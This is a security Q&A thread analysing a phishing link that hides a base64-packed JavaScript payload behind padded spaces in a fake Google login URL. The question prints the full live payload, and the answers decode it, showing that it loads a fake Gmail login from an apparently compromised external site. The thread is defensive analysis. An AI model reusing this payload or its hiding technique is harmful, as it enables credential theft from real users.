-1

I received an email from a colleague with an attached file that appeared to be on Google Drive, once clicked it led to the following URL, which recreates the Google account login page in order to steal passwords:

data:text/html,https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cscript%20src=data:text/html;base64,ZXZhbChmdW5jdGlvbihwLGEsYyxrLGUsZCl7ZT1mdW5jdGlvbihjKXtyZXR1cm4gY307aWYoIScnLnJlcGxhY2UoL14vLFN0cmluZykpe3doaWxlKGMtLSl7ZFtjXT1rW2NdfHxjfWs9W2Z1bmN0aW9uKGUpe3JldHVybiBkW2VdfV07ZT1mdW5jdGlvbigpe3JldHVybidcXHcrJ307Yz0xfTt3aGlsZShjLS0pe2lmKGtbY10pe3A9cC5yZXBsYWNlKG5ldyBSZWdFeHAoJ1xcYicrZShjKSsnXFxiJywnZycpLGtbY10pfX1yZXR1cm4gcH0oJzMuMi4xNj0iMTUgMTQgMTMgMTcgMTgiOzIxeygyMCgpezE5IDE9My4yLjEyKFwnMVwnKTsxLjEwPVwnNy84LTZcJzsxLjExPVwnOSA2XCc7MS4yMj1cJ1wnOzIuMzEoXCczNFwnKVswXS4yMygxKX0oKSl9MzMoMzUpe30zLjIuMzYuMzc9Ijw0IDM5PVxcIjM4Oi8vMzIuMjYvMjUtMjQvXFwiIDI3PVxcIjI4OiAwOzMwOiA1JTsyOTo1JVxcIj48LzQ+IjsnLDEwLDQwLCd8bGlua3xkb2N1bWVudHx3aW5kb3d8aWZyYW1lfDEwMHxpY29ufGltYWdlfHh8c2hvcnRjdXR8dHlwZXxyZWx8Y3JlYXRlRWxlbWVudHxiZWVufGhhdmV8WW91fHRpdGxlfFNpZ25lZHxvdXR8dmFyfGZ1bmN0aW9ufHRyeXxocmVmfGFwcGVuZENoaWxkfGNvbnRlbnR8d3B8Y2x1YnxzdHlsZXxib3JkZXJ8aGVpZ2h0fHdpZHRofGdldEVsZW1lbnRzQnlUYWdOYW1lfGJsdWV2b2ljZXBnaHxjYXRjaHxoZWFkfGV8Ym9keXxvdXRlckhUTUx8aHR0cHxzcmMnLnNwbGl0KCd8JyksMCx7fSkpCg==%3E%3C/script%3E

From the script is there any way of identifying where the information is being sent, had I put in my email address and password?

The Guy with The Hat
  • 10,836
  • 8
  • 57
  • 75
Axel
  • 9
  • 1
  • 1

3 Answers3

3

Let's break down the attack as far as we can :

it's a url, starting off with the basic gmail login link, which sets a few request variables to automatically login if possible.

data:text/html,https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue

This is followed by a large amount of empty spaces, intended to hide the malicious payload from view in the browser address bar.

%20%20%20%20%20%20%20%20%20%20%20% (etc)

now follows the payload for the victim. it's base64 encoded.

when we decode it, it looks like this : 

eval(function (p, a, c, k, e, d)
{
    e = function (c)
    {
        return c
    };
    if (!''.replace(/^/, String))
    {
        while (c--)
        {
            d[c] = k[c] || c
        }
        k = [function (e)
            {
                return d[e]
            }
        ];
        e = function ()
        {
            return '\\w+'
        };
        c = 1
    };
    while (c--)
    {
        if (k[c])
        {
            p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c])
        }
    }
    return p
}
    ('3.2.16="15 14 13 17 18";21{(20(){19 1=3.2.12(\'1\');1.10=\'7/8-6\';1.11=\'9 6\';1.22=\'\';2.31(\'34\')[0].23(1)}())}33(35){}3.2.36.37="<4 39=\\"38://32.26/25-24/\\" 27=\\"28: 0;30: 5%;29:5%\\"></4>";', 10, 40, '|link|document|window|iframe|100|icon|image|x|shortcut|type|rel|createElement|been|have|You|title|Signed|out|var|function|try|href|appendChild|content|wp|club|style|border|height|width|getElementsByTagName|bluevoicepgh|catch|head|e|body|outerHTML|http|src'.split('|'), 0, {}
    ))

this, is evil, obfuscated javascript. do not execute it.

martinstoeckli's answer contains the expanded version of this script.

it sets the title of your current tab to mimick the 'you have been signed out' page of gMail, and alters the page, adding a screen-filling iframe with no borders.

The iFrame points at (what appears to be) a compromised wordpress site, that contains a faked gmail login page. Upon entering credentials into the fake page hosted on bluevoicepgh.club (someone might want to notify these people that their wordpress website is probably compromised), you are then redirected to the gmail page that had silently logged you in in the background. this happens regardless of whether the credentials you entered into the fake login page were correct or not.

If you had indeed entered valid credentials into that page, there is no telling where it would have gone unless you could look at the script behind it.

Keep in mind, that (thankfully) in its current form, the attack won't work properly since google's login page uses https (and enforces use of https). As chrome reminds us when the script is executed :

Mixed Content: The page at 'https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false…9keXxvdXRlckhUTUx8aHR0cHxzcmMnLnNwbGl0KCd8JyksMCx7fSkpCg==%3E%3C/script%3E' was loaded over HTTPS, but requested an insecure resource 'http://bluevoicepgh.club/wp-content/'. This request has been blocked; the content must be served over HTTPS.

Timothy Groote
  • 8,614
  • 26
  • 52
  • For those who are wondering after they pasted it to their browser. Its _safe_ now :). The domain is **closed** and it will not work. – Reyo Mar 30 '17 at 12:45
1

The script cannot work, because google is sending the x-frame-options = deny (it is upon the browser to respect this header), but the intention of the link seems like this:

  • The %20 are blanks, this way one hopes to hide the content of the URL, because the following content could be out of the visible area.
  • The script itself tries to put the valid page into a (probably invisible) frame using the whole window. Whatever you click on this page, can be intercepted by the malicious page.

Maybe someone wants to analyse the frame, but it should be done with care, the malicious domain is bluevoicepgh.

window.document.title = "You have been Signed out";
try {
    (function() {
        var link = window.document.createElement('link');
        link.type = 'image/x-icon';
        link.rel = 'shortcut icon';
        link.href = '';
        document.getElementsByTagName('head')[0].appendChild(link)
    }())
} catch (e) {}
window.document.body.outerHTML = "<iframe src=\"http://!!maliciousdomain!!.club/wp-content/\" style=\"border: 0;width: 100%;height:100%\"></iframe>";
martinstoeckli
  • 23,430
  • 6
  • 56
  • 87
0

The best way to figure it out is, when it prompts you to enter your credentials, check in which domain you are actually in. If it is google domain then its ok, if not then it's something related to Phishing.

Here you should be very careful in checking the domain, the attackers play a trick, if the domain is google they create very similar something like gooogle or geogle something. So Carefully check the domain.

Nathan Rice
  • 3,091
  • 1
  • 20
  • 30
Radhakrishna Pemmasani
  • 766
  • 6
  • 16